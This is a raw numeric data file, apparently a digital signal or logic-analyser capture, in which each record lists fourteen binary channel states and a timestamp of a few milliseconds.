0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4907320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4907560e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4907800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4908040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4908360e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4908600e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4908640e-03 0,1,0,0,1,1,0,0,0,1,0,0,1,0,4.4909120e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4909400e-03 0,1,0,0,1,1,0,0,0,0,0,0,0,0,4.4909440e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4909480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4909640e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4909880e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4910120e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4910400e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4910680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4910920e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4911200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4911440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4911720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4911960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4912200e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4912440e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4912680e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4912960e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4913240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4913480e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4913720e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4914000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4914280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4914520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4914760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4915000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4915240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4915520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4915760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4916040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4916280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4916520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4916760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4917000e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4917240e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4917520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4917800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4918040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4918280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4918520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4918760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4919040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4919280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4919520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4919760e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4920040e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4920280e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4920520e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4920800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4921080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4921320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4921560e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4921800e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4922120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4922320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4922600e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4922840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4923080e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4923320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4923560e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4923840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4924120e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4924320e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4924600e-03 0,1,0,0,1,0,0,0,0,0,0,0,1,0,4.4924840e-03 0,1,0,0,1,0,0,0,0,0,0,0,0,0,4.4925080e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,0,4.4925160e-03 0,1,0,0,1,1,0,0,0,1,0,0,0,1,4.6167720e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,4.6169760e-03 1,1,0,0,1,1,0,0,0,1,0,1,0,1,4.6170040e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,4.6170280e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,1,4.6173640e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,4.6173880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,4.6173960e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,4.6174120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,4.6174360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,4.6174600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,4.6174880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,4.6175120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,4.6175400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,1,4.6175640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,1,4.6175880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6176080e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6176120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6176360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6176600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6176880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6177120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6177400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6177640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6177880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6178120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6178360e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6178440e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6178880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6179120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6179200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6179400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6179640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6179880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6180120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6180360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6180600e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6180680e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6181160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6181400e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,4.6181440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6181480e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6181640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6181880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6182120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6182360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6182600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6182880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6183120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6183400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6183880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6184120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6184360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6184600e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6184680e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6185120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6185400e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,4.6185440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6185480e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6185640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6185880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6186120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6186360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6186600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6186880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6187120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6187400e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6187880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6188120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6188200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6188360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6188600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6188880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6189120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6189160e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6189640e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6189880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6189960e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6190120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6190360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6190600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6190880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6191120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6191400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6191880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6192120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6192360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6192600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6193160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6193400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6193640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6193880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6194120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6194360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6194600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6194880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6195120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6195400e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6195880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6196120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6196200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6196360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6196600e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6196680e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6197120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6197400e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,4.6197440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6197480e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6197640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6197880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6198120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6198360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6198600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6198880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6199120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6199400e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6199880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6200120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6200200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6200360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6200600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6200880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6201120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6201400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6201640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6201880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6202120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6202360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6202600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6202880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6203120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6203400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6203640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6203880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6204120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6204360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6204600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6204880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6205120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6205400e-03 1,1,0,0,1,0,0,0,0,1,0,0,0,0,4.6205640e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6205680e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6206120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6206360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6206440e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6206600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6206880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6207120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6207400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6207640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6207880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6208440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6208680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6208880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6209160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6209400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6209640e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6209720e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6209880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6210120e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6210400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6210600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6210720e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6211160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6211400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6211640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6211880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6212120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6212400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6212440e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6212880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6213160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6213200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6213400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6213640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6213880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6214120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6214360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6214600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6215160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6215400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6215640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6215880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6216120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6216360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6216680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6216920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6217120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6217400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6217640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6217880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6218120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6218360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6218600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6218880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6219120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6219400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6219960e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6220160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6220360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6220640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6220880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6221120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6221160e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6221400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6221680e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6221880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6222120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6222200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6222640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6222880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6223120e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6223400e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6223880e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6224120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6224200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6224360e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6224600e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6224880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6225120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6225400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6225640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6225880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6226120e-03 1,1,0,0,1,0,0,0,0,1,0,0,0,0,4.6226160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6226200e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,4.6226600e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6226880e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,4.6226920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6226960e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6227160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6227400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6227640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6227880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6228120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6228360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6228600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6228880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6229120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6229400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6229640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6229880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6230120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6230360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6230600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6230880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6231120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6231400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6231640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6231880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6232120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6232360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6232600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6232880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6233120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6233400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6233640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6233880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6234120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6234360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6234600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6234880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6235120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6235400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6235640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6235880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6236120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6236360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6236600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6236880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6237120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6237400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6237640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6237880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6238120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6238360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6238600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6238880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6239120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6239400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6239640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6239880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6240120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6240360e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6240600e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6240880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6241120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6241400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6241680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,4.6241920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,4.6242200e-03 1,1,0,0,1,0,0,0,0,1,0,0,0,0,4.6242440e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,4.6242480e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,4.7486800e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.7488520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,4.7488760e-03 0,0,1,0,1,1,0,0,0,1,0,1,0,1,4.7489080e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,4.7489320e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,1,4.7492440e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,4.7492680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,4.7492760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,1,4.7493160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,4.7493400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,1,4.7493920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,4.7494200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,1,4.7494680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,4.7494920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7495120e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7495400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7495680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7496200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7496440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7496680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7496920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7497200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7497400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7497960e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7498200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7498680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7498920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7499000e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7499400e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7499680e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,4.7499720e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7499760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7500200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7500440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7500920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7501200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7501400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7501680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7501720e-03 